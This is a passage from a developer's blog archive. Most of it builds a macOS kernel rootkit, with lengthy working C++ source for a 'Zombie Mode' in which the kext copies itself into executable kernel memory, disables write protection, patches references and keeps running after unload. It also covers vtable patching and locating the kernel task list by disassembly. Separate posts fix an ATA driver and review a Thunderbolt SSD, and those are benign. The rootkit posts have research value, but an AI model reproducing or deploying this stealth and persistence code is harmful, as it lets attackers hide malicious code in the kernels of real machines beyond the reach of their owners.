                if(!nextSymbolOffset) // Did not get any following symbol ref, that's really bad!
                {
                    error = true;
                    break;
                }
                    
                mach_vm_address_t addressOfNextSymbol = (mach_vm_address_t)sm_zombieMemory + nextSymbolOffset;
                
                printf("[ZOMBIE] vtable patching symbol: %s vtable offset: %p\n", symbolRef->getName(),  (void*)vtablePtrOffset);
                
                cxx_patch_vtable(firstVirtualMethodPtr, addressOfNextSymbol, addressOfSectionEnd);

                numWasPatched++;
            }
        }
        vtableSymbolRefs->release();
        vtableSymbolRefs = NULL;
        
        if(error)
            break;
        
        if(numMustBePatched != numWasPatched)
        {
            printf("[ZOMBIE] Had to patch #%d vtable's but only #%d have been done\n", numMustBePatched, numWasPatched);
            error = true;
            break;
        }
    }
    
    if(error)
    {
        printf("[ZOMBIE] Error getting/patching all vtable symbol refs\n");
    }
    else
    {
        kr = KERN_SUCCESS;
    }
    
    symbolRefs->release();
    _FREE(*sectionConst, M_TEMP); // We are responsible to _FREE() m_data
    sectionConst->release();
        
    return kr;
}

// Array of classes that have virtual methods
const char* ZombieMode::sm_classNames[] = 
{ 
"BaseClass", "Kernel", "VmMap", "Task", "TaskNode", "Vnode", "IpFilter", "IpFilterNode", "FileDescriptor", "FileProc", "FileGlob", "Process", "Hook", "FunctionHook", "NopFunctionHook", "InstructionHook", "AddCmpInstructionHook", "LeaInstructionHook", "JmpInstructionHook", "CallInstructionHook", "XRefNode", "InstructionTypeNode", "CrossReferences", "NopNode", "NopSpace", "FunctionValidator", "StringNode", "GetDirectoryEntries", "InterfaceFilterNode", "InterfaceFilter", "MigSubsystem", "SocketFilterNode", "SocketFilter", "MacPolicyNode", "MacPolicy", "Syscall", "Kextstat", "ListNode", "List", "PointerNode", "Cpu", "HashTable", "Disassembler", "SystemControlNode", "SystemControl", "KAuthScopeNode", "KAuthListenerNode", "KAuth", "KernelControlNode", "KernelControl", "MachO", "Mutex", "ReadWriteLock", "Semaphore", "Thread", "ThreadCall", "Timer", "Destructor", "SingletonDestructor", "AutoreleaseThread", 
    NULL };

// Array of classes that are nested in another class and have virtual methods
const char* ZombieMode::sm_nestedClassNames[] = {
    "MachO", "Header64", "MachO", "LoadCommand", "MachO", "SegmentCommand64", "MachO", "SymtabCommand", "MachO", "Section64", "MachO", "NList64", NULL, NULL };
 

Hopefully this article makes some things clearer about Virtual Method Tables as they are used in 64-bit Mac OS X Kexts and how to mess with them. I can also think of some other use cases besides the one demonstrated here. One is hooking virtual methods of any I/O Kit class, and there are many more.

Zombie Mode for Heroine Rootkit

-

I am proud to announce that my future Anti-Rootkit Rootkit Heroine now supports Zombie Mode. If you don’t know, or have forgotten, what Zombie Mode is, read my earlier post about the last Phrack article from fg!.

It was quite easy with the code from the Phrack article, so a really big thank you to fg! for defining the necessary steps.

Zombie step by step

  1. Resolve all external symbols our Kext uses
  2. Get Kext base/load address and its minimum memory size
  3. Calculate the distance to the thread_continue_t (a function) we use to wake up the zombie
  4. Allocate memory for the zombie and copy the kext into it
  5. Make the zombie memory executable
  6. Get xrefs (cross references) for all external symbols our Kext uses
  7. Patch all xrefs
  8. Add thread_continue_t distance to zombie memory and create a new thread to call it

That’s it. It sounds easy, but you have to implement a lot of dependencies to make all steps possible. For example, you must have a working disassembler in your Kext, or another working method to get all xrefs, and you need code to patch ’em all. I’m patching all CALL, JMP and LEA instructions, and that works fine. By the way, no JMP and no LEA xref was found. So here is my ZombieMode init code at the time of writing:

ZombieMode.cpp (Repository)

// Array of external symbols, was generated in Terminal.app:
// for i in `nm -u  Heroine.kext/Contents/MacOS/Heroine`; do /bin/echo -n \"$i\",; done ; echo NULL
const char* ZombieMode::sm_symbolNames[] = 
{ "__MALLOC","_clock_delay_until","_IORecursiveLockLock","_IORecursiveLockUnlock","_OSCompareAndSwap","_OSDecrementAtomic", /* ...and many more symbols... */ NULL };

kern_return_t ZombieMode::init()
{
    // Credits for all necessary steps go to author of the_flying_circus.kext aka fg! 
    // More: http://reverse.put.as
    
    // 1) Resolve all external symbols our Kext uses
    
    sm_symbolAddresses = List::list();
    if(!sm_symbolAddresses)
    {
        printf("[ZOMBIE] Could not allocate memory for symbol nodes\n");
        return KERN_MEMORY_FAILURE;
    }
    
    Kernel* kernel = Kernel::kernel();
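    if(!kernel)
    {
        printf("[ZOMBIE] Cannot resolve kernel symbols\n");
        sm_symbolAddresses->release(); // do not leak the list on this error path
        sm_symbolAddresses = NULL;
        return KERN_MEMORY_FAILURE;
    }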
    
    PointerNode* lastSymbolAddressNode = NULL;
    bool error = false;
    
    const char* currentSymbol = sm_symbolNames[0];
    for(int i = 0; currentSymbol != NULL; currentSymbol = sm_symbolNames[++i] )
    {
        void* ptr = (void*)kernel->resolveSymbol(currentSymbol);
        if(!ptr)
        {
            error = true;
            break;
        }
        
        PointerNode* symbolAddressNode = PointerNode::alloc();
        if(!symbolAddressNode)
        {
            error = true;
            break;
        }
        *symbolAddressNode = ptr;
        
        // Important to keep the order for later mappings !!
        if(lastSymbolAddressNode == NULL)
            sm_symbolAddresses->insertHead(symbolAddressNode);
        else
            sm_symbolAddresses->insertAfter(symbolAddressNode, lastSymbolAddressNode);
        
        lastSymbolAddressNode = symbolAddressNode;
        symbolAddressNode->release();
    }
    if(error)
    {
        sm_symbolAddresses->release();
        sm_symbolAddresses = NULL;
        kernel->release();
        
        printf("[ZOMBIE] error resolving external symbols or allocating nodes for it\n");
        
        return KERN_FAILURE;
    }
    
    kernel->release();
    kernel = NULL;
    
    // 2) Get Kext base address and its minimum memory size
    
    sm_kextBaseAddress = (mach_vm_address_t) Kext::getBaseAddress();
    if(!sm_kextBaseAddress)
    {
        printf("[ZOMBIE] Could not get Kext base address\n");
        return KERN_FAILURE;
    }
    
    struct segment_command_64* textSegment = Kext::getTextSegment();
    struct segment_command_64* dataSegment = Kext::getDataSegment();
    
    if(!textSegment || !dataSegment)
    {
        printf("[ZOMBIE] Could not get Kext segments\n");
        return KERN_FAILURE;
    }
    
    sm_kextSize = textSegment->vmsize + dataSegment->vmsize;
    
    // 3) Calculate the distance to the thread_continue_t we use to wake up the zombie 
    sm_wakeupDistance = ((mach_vm_address_t)ZombieMode::wakeup) - sm_kextBaseAddress;
    
    printf("[ZOMBIE] Wakeup distance: %p\n", (void*)sm_wakeupDistance);
    
    // 4) Allocate memory for the zombie and copy the kext into it
    
    sm_zombieMemory = _MALLOC(sm_kextSize, M_TEMP, M_WAITOK);
    if(!sm_zombieMemory)
    {
        printf("[ZOMBIE] Could not allocate memory\n");
        return KERN_MEMORY_FAILURE;
    }
    
    
    Cpu::disableInterrupts();
    Cpu::setWriteProtection(Cpu::WriteProtectionDisabled);

    memcpy(sm_zombieMemory, (const void*)sm_kextBaseAddress, sm_kextSize);

    Cpu::setWriteProtection(Cpu::WriteProtectionEnabled);
    Cpu::enableInterrupts();
    
    // 5) Make the zombie memory executable
    
    task_lock(kernel_task);


    vm_prot_t memProtection = VM_PROT_EXECUTE | VM_PROT_READ;
    
    VmMap* kernelMap = VmMap::kernelMap();
    if(!kernelMap)
    {
        printf("[ZOMBIE] Could not get kernel vm_map\n");

        task_unlock(kernel_task);
        return KERN_FAILURE;
    }
    
    
    
    // 1st try mach_vm_protect
    kern_return_t kr = kernelMap->setProtection((mach_vm_address_t)sm_zombieMemory, sm_kextSize, memProtection);
    if(kr != KERN_SUCCESS)
    {
        printf("[ZOMBIE] Could not set memory protection\n");
        
        // 2nd try vm_map_protect
        kr = kernelMap->setMachProtection((mach_vm_address_t)sm_zombieMemory, sm_kextSize, memProtection);                      
        if(kr != KERN_SUCCESS)
        {
            printf("[ZOMBIE] Could not set memory protection (2nd try)\n");
            
            kernelMap->release();
            task_unlock(kernel_task);
            
            return KERN_FAILURE;
        }
    }
    
    vm_prot_t newProtection = kernelMap->getProtection((mach_vm_address_t)sm_zombieMemory, sm_kextSize);
    printf("[ZOMBIE] Protection of Zombie Memory: %s\n", vmprottoa(newProtection));

    kernelMap->release();
    task_unlock(kernel_task);    
    
    // 6) Get xrefs for all external symbols in our kext

    CrossReferences* xrefs = CrossReferences::xrefs();
    if(!xrefs)
    {
        printf("[ZOMBIE] Could not allocate CrossReferences\n");
        return KERN_FAILURE;
    }
        

    
    xrefs->setInstructionTypes( (_InstructionType[]){ I_JMP, I_CALL, I_LEA } , 3);
    xrefs->setSearchStartAddress(sm_kextBaseAddress);
    xrefs->setSearchEndAddress(sm_kextBaseAddress + sm_kextSize);
    
    

    List* xrefsList = xrefs->searchForSymbols(sm_symbolAddresses);
    // Just test with printf() 
    //xrefs->searchForSymbol( (mach_vm_address_t)printf );
    
    sm_symbolAddresses->release();
    sm_symbolAddresses = NULL;
    
    xrefs->release();
    
    if(!xrefsList || xrefsList->getCount() < 1)
    {
        printf("[ZOMBIE] No CrossReferences found.\n");
        SafeRelease(xrefsList);
        
        return KERN_FAILURE;
    }
    
    // 7) Patch all xrefs
    
    int leaHooks = 0;
    int jmpHooks = 0;
    int callHooks = 0;
    
    InstructionHook* hook;
    mach_vm_address_t zombieBaseAddress = (mach_vm_address_t)sm_zombieMemory;
    XRefNode* xrefNode;
    List_foreach(xrefsList, xrefNode)
    {
        struct xref* xref = *xrefNode;
        switch(xref->instructionType)
        {
            case I_LEA:
            {
                hook = LeaInstructionHook::hook();
                leaHooks++;
            } break;
            case I_CALL:
            {
                hook = CallInstructionHook::hook();
                callHooks++;
            } break;
            case I_JMP:
            {
                hook = JmpInstructionHook::hook();
                jmpHooks++;
            } break;
            default:
            {
                hook = NULL;
                printf("[ZOMBIE] Unsupported xref detected!\n");
            } break;    
        };
        
        if(hook)
        {
         
            mach_vm_address_t xrefDistance = xref->address - sm_kextBaseAddress;
            mach_vm_address_t addressInZombie = zombieBaseAddress + xrefDistance;
            
        
            
            hook->setAddress(addressInZombie, xref->size, xref->symbol);
            hook->setDeactivateOnFree(false);
            hook->activate();
            hook->release();
            hook = NULL;
        }
    }
    
    printf("[ZOMBIE] No. of hooks LEA: %d JMP: %d CALL: %d\n", leaHooks, jmpHooks, callHooks);
    
    xrefsList->release();
    xrefsList = NULL;
    
    // 8) Calculate where ZombieMode::wakeup() will be in sm_zombieMemory and create a new thread to call it
    thread_continue_t zombieWakeup = (thread_continue_t)(((mach_vm_address_t)sm_zombieMemory) + sm_wakeupDistance);
    
    printf("[ZOMBIE] Zombie Base: %p Wakeup: %p Distance: %p\n", (void*)zombieBaseAddress, zombieWakeup, (void*)((mach_vm_address_t)zombieWakeup - zombieBaseAddress));
    
    printf("[ZOMBIE] Kext Base: %p Wakeup: %p Distance: %p\n", (void*)sm_kextBaseAddress, (void*)ZombieMode::wakeup, (void*)((mach_vm_address_t)ZombieMode::wakeup - sm_kextBaseAddress));

    thread_t zombieThread;
    kr = kernel_thread_start(zombieWakeup, NULL, &zombieThread);
    if(kr != KERN_SUCCESS)
    {
        printf("[ZOMBIE] Could not start a new kernel thread\n");
        return kr;
    }
    
    // Drop our reference only after a successful start, zombieThread is not valid otherwise
    thread_deallocate(zombieThread);
    
    
    printf("[ZOMBIE] until here all went good\n");
    return KERN_SUCCESS;
}



void ZombieMode::wakeup(void *parameter, wait_result_t x)
{
    printf("[ZOMBIEMODE] !!\n");
    
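    // NOTE: mach_absolute_time() counts in absolute time units. Adding nanoseconds
    // directly is only correct where the timebase is 1:1, which is the case on Intel Macs
    clock_delay_until(mach_absolute_time() + 15 * NSEC_PER_SEC);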

    mach_vm_address_t base = (mach_vm_address_t)sm_zombieMemory;
    
    #ifdef DEBUG
    char buff[32];
    bzero(buff, 32);
    snprintf(buff, 31, "addkext: %p", sm_zombieMemory);
    BREAKPOINT(buff);
    // We can debug the Zombie just like any other kext 
    #endif //DEBUG
    
    VmMap* map = VmMap::kernelMap();
    if(map)
    {
        printf("[ZOMBIEMODE] map: %p sm_instancecount: %p\n", map, &VmMap::sm_instanceCount);

        
        vm_prot_t prot = map->getProtection(base, sm_kextSize);
        
        printf("[ZOMBIEMODE] Zombie Mem vm_prot: %s\n", vmprottoa(prot));
        
        map->release();
        
    }

    
    printf("[ZOMBIEMODE] debug kernel: %d\n", Kernel::isDebugBuild() ? 1 : 0);
        
    
    ZombieMode::terminate();
}
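Why step 7 is needed at all can be shown with a small sketch. A `CALL rel32` stores the distance from the end of the instruction to its target, so a byte-for-byte copy of the instruction at a new address no longer reaches the same external function. The code below is one common way to recompute that displacement, written for user space; `rel32For` and `retargetCall` are hypothetical helpers and not necessarily what CallInstructionHook does internally.

```cpp
#include <cstdint>
#include <cstring>

// Computes the rel32 displacement that makes a 5-byte CALL (opcode E8)
// located at instrAddr reach target. Returns false when the distance
// does not fit into a signed 32-bit value.
bool rel32For(uint64_t instrAddr, uint64_t target, int32_t* out) {
    const int64_t delta = (int64_t)(target - (instrAddr + 5));
    if (delta < INT32_MIN || delta > INT32_MAX)
        return false;
    *out = (int32_t)delta;
    return true;
}

// Rewrites the displacement of the CALL stored in code[0..4], assuming
// this copy of the instruction will execute at address runAddr.
bool retargetCall(uint8_t* code, uint64_t runAddr, uint64_t target) {
    if (code[0] != 0xE8)  // only the near relative CALL is handled here
        return false;
    int32_t disp = 0;
    if (!rel32For(runAddr, target, &disp))
        return false;
    std::memcpy(code + 1, &disp, sizeof disp);  // x86 stores it little-endian
    return true;
}
```

The range check matters for this use case: memory obtained from an allocator can end up more than 2 GB away from the kernel text, in which case a plain rel32 CALL cannot reach the target and a different instruction sequence would be required.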

But to be honest, one big problem remains.

C++ makes life easier and sometimes much harder

Since my Rootkit is written in C++ from scratch, to make my life easier and the code more readable, I must admit that Zombie Mode only works with one big hack: I have to completely disable all vtables for all classes. In other words, no virtual methods are possible, which leads to leaking memory at the moment, since nearly all my classes need at least a virtual destructor to be freed correctly.

When a Kext is loaded, KXLD initializes all vtables at runtime. So just copying the Kext’s memory to a new location and patching xrefs is not enough: all vtables will hold dangling pointers after the Kext is unloaded and we run in Zombie Mode. So my next step will be to patch all vtables.

Research so far

Since the memory layout of a C++ vtable is implementation specific, I started by finding out which ABI is used on 64-bit Mac OS X. It’s the Itanium C++ ABI. Next I investigated kxld_vtable.c, part of the kernel dynamic loader aka KXLD. But the journey isn’t over yet; I’m still not sure how to patch the tables. So stay tuned. For those of you who are more interested in vtables, I read two good articles: A Basic Glance at the virtual table, and, about the C++ object memory layout for clang on Linux, Dumping a C++ Objects memory layout.
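To make the layout a bit more tangible, here is a small user-space sketch. It relies on the Itanium C++ ABI rule that the first pointer-sized word of a polymorphic object is its vptr, so it is ABI-specific and not portable C++. The classes `Base` and `Derived` and the helper `vptrOf` are made up for this illustration.

```cpp
#include <cstdint>
#include <cstring>

struct Base {
    virtual ~Base() {}
    virtual int id() const { return 1; }
};

struct Derived : Base {
    int id() const override { return 2; }
};

// Reads the hidden vptr, which the Itanium C++ ABI places at offset 0
// of an object of a class with virtual functions.
uintptr_t vptrOf(const Base& object) {
    uintptr_t vptr = 0;
    std::memcpy(&vptr, &object, sizeof vptr);
    return vptr;
}
```

All objects of the same dynamic type share one table, so two `Base` objects report the same vptr while a `Derived` object reports a different one. Those shared tables are exactly what still points into the old Kext image after the copy.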

I hope I can patch my classes’ vtables soon so the memory-leaking destruction of objects is fixed.

Special I/O Kit Family for Stuck ATA Controllers: IOATAFamily.kext

-

Did you ever encounter this error in your system.log?

IOATAController device blocking bus.

If you’ve seen that, you probably have a malfunctioning hard disk drive, and soon after you will encounter data loss and/or an HFS volume corrupted at runtime.

In my case the malfunctioning device is in my Dell D630 hackintosh. I use a MediaBay enclosure that takes a 2.5” Serial ATA HDD and plugs into the Dell’s parallel ATA/IDE bus. But from time to time the MediaBay drive drives me crazy by blocking the bus. Until today the only fix was to restart the machine as soon as possible after seeing the above log entry; otherwise my data got corrupted, which made me mad.

First I thought the hard drive was going to die, so I put in one of my brand new spare drives. But the problem remained. So I took the old drive, put it into a USB housing and ran a complete test, and the result was as expected: the HDD is fine!

So I had to investigate further, since I wanted to fix that. My thought was: which driver logs the error? It must be either the I/O Kit Family, IOATAFamily.kext, or the driver implementing the family, in my case AppleIntelPIIXATA.kext. Since there is no source code for the latter, I downloaded the former from http://opensource.apple.com and searched for the log message.

And found it in this function:

IOATAFamily/IOATAController.cpp
IOReturn
IOATAController::handleExecIO( void )
{
    IOReturn err = kATANoErr;
    
    // select the desired device
    // don't start the IOTimer until after selection as there are no
    // generation counts in the IOTimerEventSource. Device Selection will honor 
    // the timeout value in ms on its own.
    err = selectDevice( _currentCommand->getUnit() );
    if( err )
    {    
        IOLog("IOATAController device blocking bus.\n");
        _currentCommand->state = IOATAController::kATAComplete;

        if( _currentCommand->getFlags() & mATAFlagUseNoIRQ )
        {
            completeIO( kIOReturnOffline );    
            return kIOReturnOffline;    
        }
        
        startTimer( 1000 );  // start a 1 second timeout so that we can unwind the stack if the bus is stuck.
        return kATANoErr;  // defer error handling to the timer thread. 
    }

    // start the IO Timer
    startTimer( _currentCommand->getTimeoutMS() );


    // go to asyncIO and start the state machine.
    // indicate the command has been issued
    _currentCommand->state = IOATAController::kATAStarted;        
    if( _currentCommand->getFlags() & mATAFlagUseNoIRQ )
    {
        err = synchronousIO();
    } else {
        err = asyncIO();
    }
        
    // return success and pend IRQ for further operation or completion.
    
    return err;

}

The device is blocking the bus. What can we do now? Reset the bus, and luckily for us Apple implemented a method that does a software reset.

IOATAFamily/IOATAController.h
class IOATAController : public IOService
{
    OSDeclareDefaultStructors(IOATAController);
public:
// ...

virtual IOReturn softResetBus( bool doATAPI = false );

// ...
};

The only thing left was to find out how to supply the correct parameter. See my version of the handleExecIO() method for how I did that:

Modified method
IOReturn
IOATAController::handleExecIO( void )
{
    IOReturn err = kATANoErr;
    
    // select the desired device
    // don't start the IOTimer until after selection as there are no
    // generation counts in the IOTimerEventSource. Device Selection will honor 
    // the timeout value in ms on its own.
    err = selectDevice( _currentCommand->getUnit() );
    if( err )
    {    
        IOLog("IOATAController device blocking bus.\n");

        _currentCommand->state = IOATAController::kATAComplete;

        // DO NOT reset bus if we are not IRQ driven
        
        if( _currentCommand->getFlags() & mATAFlagUseNoIRQ )
        {
            completeIO( kIOReturnOffline );    
            IOLog("IOATAController return Offline.\n");
            return kIOReturnOffline;    
        }
        
        // FIX - BEGIN
        
        IOLog("IOATAController soft resetting bus.\n");
        
        bool isATAPIReset = ((_currentCommand->getFlags() & mATAFlagProtocolATAPI) != 0);
        softResetBus(isATAPIReset);
        
        // Increased time so soft bus reset is  done
        startTimer( 2000 );  // start a 2 second timeout so that we can unwind the stack if the bus is stuck.
        
        IOLog("IOATAController started a 2 second timer because the bus is stuck.\n");

        // FIX - END
        
        return kATANoErr;  // defer error handling to the timer thread. 
    }

    // start the IO Timer
    startTimer( _currentCommand->getTimeoutMS() );


    // go to asyncIO and start the state machine.
    // indicate the command has been issued
    _currentCommand->state = IOATAController::kATAStarted;        
    if( _currentCommand->getFlags() & mATAFlagUseNoIRQ )
    {
        err = synchronousIO();
    } else {
        err = asyncIO();
    }
        
    // return success and pend IRQ for further operation or completion.
    
    return err;
}

This did the trick for me. The HDD is now working as expected again, with no more system reboots and no more data corruption.

If you like, you can download my version of the I/O Kit Family. It is signed, so it can be placed in /Library/Extensions and will be loaded instead of the one in /System/Library/Extensions, since I increased the bundle version from 2.5.2 to 3.5.2.

Thunderbolt SSD for Testing

-

Since my storage needs are growing with each release of OS X, I decided to invest some money in external storage for my virtual machines and the corresponding snapshots.

Since my 13-inch MacBook Pro Early 2011 does not have USB 3.0, the only choices left are FireWire (800Mbps) or Thunderbolt (10Gbps). At first I decided to daisy-chain 2 FireWire drives and use them as a RAID 0, which would effectively get me near first-generation SATA speed. But after investigating the available devices, I found out that daisy-chaining disks is not really supported at all, so a hub would be needed, and prices are way too high for the delivered performance, both for the hub and for the disks I would need. A simple 3-port hub costs around 70,- €, which is very expensive compared to a USB 2.0 or a competing 3.0 one.

So a Thunderbolt SSD was the way to go. The market is not huge and prices are relatively high as well, but you get so much more performance for your money. My primary candidates were:

LaCie Rugged

LaCie SSD

A LaCie Rugged 120GB SSD, which looks awful (the orange is really bad for my colour-blind eyes), but nevertheless the performance of this drive is said to be really good, so I kept it on my list. The price currently is:

185,- €

Elgato

Elgato SSD

The next one was an Elgato 120GB SSD, which was eliminated from my list after I found out that the drive inside is second-generation SATA (3Gbps), which is less than a third of what Thunderbolt is capable of. So no chance that I would buy this drive. Even the price my retailer told me was horrible:

300,- €

Buffalo MiniStation


The 3rd candidate I found was the Buffalo MiniStation 128GB SSD, which looks really nice, and all the reviews I read promised great performance. So this drive was the one I wanted to buy. But as life sometimes goes, it was sold out everywhere I looked, and the next delivery would be no sooner than 21 days after ordering. Bad luck. By the way, the price for the drive was:

205,- €

Self-made solution

So I was looking for alternatives again and stumbled over this YouTube video. It shows how to disassemble a Buffalo MiniStation drive. But the drive used in the video was not an SSD, it was an HDD. Until that point I had not looked at Thunderbolt HDDs, only SSDs. After some investigation I can definitely tell you that the Buffalo MiniStation 500GB is currently the cheapest Thunderbolt solution on the market and a great choice for putting your own SSD into. But be aware that you may void your warranty, and something could go horribly wrong. Everything is done at your own risk. I am not responsible for it.

So I checked whether the 500GB model of the MiniStation was available at my retailer’s store, and it was. Priced at:

140,- €

Great. So what I needed next was a cheap but good SSD, and this was easy for me. I chose a Samsung 840 Evo because I already have an 840 Evo running in my MacBook and it is damn great. The 120GB model costs around:

70,- €

So my solution comes to 210,- € in total, which is a bit more than the LaCie or the Buffalo SSD, but you can use exactly the SSD you prefer.

When the 2 products were delivered, I immediately swapped out the disk in the Buffalo MiniStation as described in the video and put in the Samsung SSD, without ever plugging in the HDD. After reassembling the MiniStation I plugged in the Thunderbolt cable for the first time and, yeah, it worked as expected. Here are some screenshots of how Mavericks detected it:

Screenshot

Screenshot

Performance Test

As you can imagine, the next thing I wanted to see was, guess what, performance. The standard applications used for measuring disk performance on a Mac are Blackmagic Disk Speed Test and AJA System Test. The former can be downloaded from the Mac App Store. For the other one please use Google, since at the moment I don’t remember where I got it from, but it should be free. The file size used was 2GB.

Samsung 840 Evo 250GB SATA 6Gbps

Black Magic Internal AJA Test Internal

Samsung 840 Evo 120GB Thunderbolt Buffalo MiniStation

Black Magic Thunderbolt AJA Test Thunderbolt

Last Comment

I’m loving my new blazing-fast external storage and can recommend my self-made solution to everybody who needs a cheap Thunderbolt SSD of their choice.

And last but not least, I have already begun setting up all the virtual machines that I need to test my Heroine Anti-Rootkit Rootkit with: one each for 10.9, 10.9.1, 10.9.2, 10.9.2 with Security Update 002-2014, and 10.9.3.

Implementing Access to the Task_t List 2/2

-

Okay, I finally managed to start the integration of the tasks list.

As described in the previous article, it is not hard to get the symbol. Just resolve it from the mach_kernel binary on disk and add the KASLR slide to it.
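In code, the slide arithmetic is tiny. The sketch below assumes the slide is derived from one symbol whose runtime address is already known; `kaslrSlide` and `slideAddress` are hypothetical helper names, and how Heroine actually obtains the slide is not shown in this post.

```cpp
#include <cstdint>

// The slide is the difference between where a known symbol really is at
// runtime and where the on-disk mach_kernel says it should be.
uint64_t kaslrSlide(uint64_t runtimeAddressOfKnown, uint64_t diskAddressOfKnown) {
    return runtimeAddressOfKnown - diskAddressOfKnown;
}

// Runtime address of any other symbol resolved from the binary on disk.
uint64_t slideAddress(uint64_t diskAddress, uint64_t slide) {
    return diskAddress + slide;
}
```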

So we have the symbol, and have seen the macros and functions used to modify the list. But Houston, we have a problem. We do not want to use struct task definitions copied from some version of the XNU source; if Apple changes something in there, our code would break. Since struct task is not public KPI, Apple can do that without problems. But for our work to be done we need the offset of the field tasks in the struct shown below.

Struct

XNU/osfmk/kern/task.h (XNU Source Tree)
struct task {
    /* Synchronization/destruction information */
    decl_lck_mtx_data(,lock)        /* Task's lock */
    uint32_t    ref_count;    /* Number of references to me */
    boolean_t    active;        /* Task has not been terminated */
    boolean_t    halting;    /* Task is being halted */

    /* Miscellaneous */
    vm_map_t    map;        /* Address space description */
    queue_chain_t    tasks;    /* global list of tasks */
    void        *user_data;    /* Arbitrary data settable via IPC */

    /* Threads in this task */
    queue_head_t        threads;

    processor_set_t        pset_hint;
    struct affinity_space    *affinity_space;

    int            thread_count;
    uint32_t        active_thread_count;
    int            suspend_count;    /* Internal scheduling only */
    ...
};

So what we need is a function, the most generic one we can find, that references this field, and then use a disassembler to get the offset from it.

After searching for some time, I must admit there is not really a good candidate available that can easily be abused for our purpose. In the end my choice fell on the function shown below.

Function

XNU/osfmk/kern/task.c (XNU Source Tree)
kern_return_t
task_create_internal(
    task_t        parent_task,
    boolean_t    inherit_memory,
    boolean_t    is_64bit,
    task_t        *child_task)
{
    // ...
    // Most code omitted
    // ...

    bzero(&new_task->extmod_statistics, sizeof(new_task->extmod_statistics));
    new_task->task_timer_wakeups_bin_1 = new_task->task_timer_wakeups_bin_2 = 0;
    lck_mtx_lock(&tasks_threads_lock);
    queue_enter(&tasks, new_task, task_t, tasks);
    tasks_count++;
    lck_mtx_unlock(&tasks_threads_lock);

    if (vm_backing_store_low && parent_task != NULL)
        new_task->priv_flags |= (parent_task->priv_flags&VM_BACKING_STORE_PRIV);

    new_task->task_volatile_objects = 0;

    ipc_task_enable(new_task);

    *child_task = new_task;
    return(KERN_SUCCESS);
}

The field is accessed right after lck_mtx_lock(&tasks_threads_lock). So what we will do is look for the CALL to lck_mtx_lock and examine the instructions that follow it.

Disassembly

No.  Bytes             Opcode  Operands
1    E8383D0900        call    _lck_mtx_lock
2    488D0579DA6800    lea     rax, qword [ds:_tasks]
3    488B4808          mov     rcx, qword [ds:rax+0x8]
4    4839C1            cmp     rcx, rax
5    7406              je      0xffffff800023d33e
6    48895928          mov     qword [ds:rcx+0x28], rbx
7    EB03              jmp     0xffffff800023d341
8    488918            mov     qword [ds:rax], rbx
9    48894B30          mov     qword [ds:rbx+0x30], rcx
10   48894328          mov     qword [ds:rbx+0x28], rax
11   48895808          mov     qword [ds:rax+0x8], rbx
12   488D05A4DA6800    lea     rax, qword [ds:_tasks_count]
13   FF00              inc     dword [ds:rax]
14   488D3DA3DA6800    lea     rdi, qword [ds:_tasks_threads_lock]
15   E8FE420900        call    _lck_mtx_unlock
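To see where the offset actually hides in the bytes of instructions No. 6 and No. 10, here is a minimal sketch that decodes such a store by hand. It is only an illustration: the helper decode_mov_store_disp8 and the MovStore struct are names I made up, and it handles nothing but the exact encoding seen in the listing (REX.W prefix 0x48, opcode 0x89, ModRM with mod = 01, no SIB byte). Real code should leave this to a proper disassembler.

```cpp
#include <cstddef>
#include <cstdint>

// Decoded form of `mov qword [base + disp8], src` (illustrative only).
struct MovStore {
    unsigned base;  // register number of the memory base (0 = rax, 1 = rcx, 3 = rbx)
    unsigned src;   // register number of the stored register
    int8_t   disp;  // signed 8-bit displacement, i.e. the field offset
};

// Hypothetical helper: accepts only 48 89 /r with mod == 01 and no SIB byte.
bool decode_mov_store_disp8(const uint8_t *bytes, std::size_t len, MovStore &out)
{
    if (bytes == nullptr || len < 4 || bytes[0] != 0x48 || bytes[1] != 0x89)
        return false;

    const uint8_t  modrm = bytes[2];
    const unsigned mod   = modrm >> 6;        // addressing mode
    const unsigned reg   = (modrm >> 3) & 7;  // source register for opcode 0x89
    const unsigned rm    = modrm & 7;         // base register of the memory operand

    if (mod != 1 || rm == 4)  // mod 01 = disp8 follows; rm 4 would announce a SIB byte
        return false;

    out.base = rm;
    out.src  = reg;
    out.disp = static_cast<int8_t>(bytes[3]);
    return true;
}
```

Fed with 48 89 59 28 (No. 6) it reports a store of rbx through rcx, and with 48 89 43 28 (No. 10) a store of rax through rbx. Both carry the same displacement, which is the offset we are after.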

Algorithm

We need either instruction No. 6 or No. 10, so how do we find one of them as dynamically as possible, so that small changes to the function won’t break our code? First we search the disassembly for the CALL to lck_mtx_lock followed by a LEA which targets tasks; since we know that symbol, we can compare against it. Now we have something to start with. The hard part follows. Since the offset is referenced twice, we have 2 code paths. The first one searches the next 10 instructions after our starting point for a JMP; if the instruction right before it is a MOV that stores RBX to memory addressed through RCX, we take its displacement and are done. If that doesn’t work, we search the next few instructions after the JMP for a MOV that stores RAX to memory addressed through RBX. If that fails too, we give up, since the function has probably changed too much for our algorithm to still apply.
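To make the two code paths easier to follow, here is a toy model of the search that runs on a hand-written copy of the 15 instructions instead of real disassembler output. Everything in it (Insn, Op, Reg, Sym, find_tasks_offset, release_listing) is made up for this sketch, and it simplifies things: when the anchor does not match, it just keeps scanning.

```cpp
#include <cstddef>
#include <cstdint>
#include <vector>

enum class Op  { Call, Lea, Mov, Cmp, Je, Jmp, Inc };
enum class Reg { None, Rax, Rbx, Rcx };
enum class Sym { None, LckMtxLock, Tasks, Other };

// Toy instruction: `base`/`src`/`disp` are only set for stores `mov [base+disp], src`.
struct Insn { Op op; Sym target; Reg base; Reg src; uint32_t disp; };

bool find_tasks_offset(const std::vector<Insn> &code, uint32_t &offset)
{
    for (std::size_t i = 0; i + 1 < code.size(); i++) {
        // Anchor: CALL lck_mtx_lock directly followed by LEA reg, [tasks]
        if (code[i].op != Op::Call || code[i].target != Sym::LckMtxLock ||
            code[i + 1].op != Op::Lea || code[i + 1].target != Sym::Tasks)
            continue;

        // Look for the JMP within the next 10 instructions after the anchor
        for (std::size_t j = i + 2; j < i + 12 && j < code.size(); j++) {
            if (code[j].op != Op::Jmp)
                continue;

            // Path 1: store right before the JMP, mov [rcx+disp], rbx
            const Insn &prev = code[j - 1];
            if (prev.op == Op::Mov && prev.base == Reg::Rcx && prev.src == Reg::Rbx) {
                offset = prev.disp;
                return true;
            }
            // Path 2: store shortly after the JMP, mov [rbx+disp], rax
            for (std::size_t k = j + 1; k < j + 5 && k < code.size(); k++) {
                if (code[k].op == Op::Mov && code[k].base == Reg::Rbx && code[k].src == Reg::Rax) {
                    offset = code[k].disp;
                    return true;
                }
            }
            return false;  // layout changed too much, give up
        }
    }
    return false;
}

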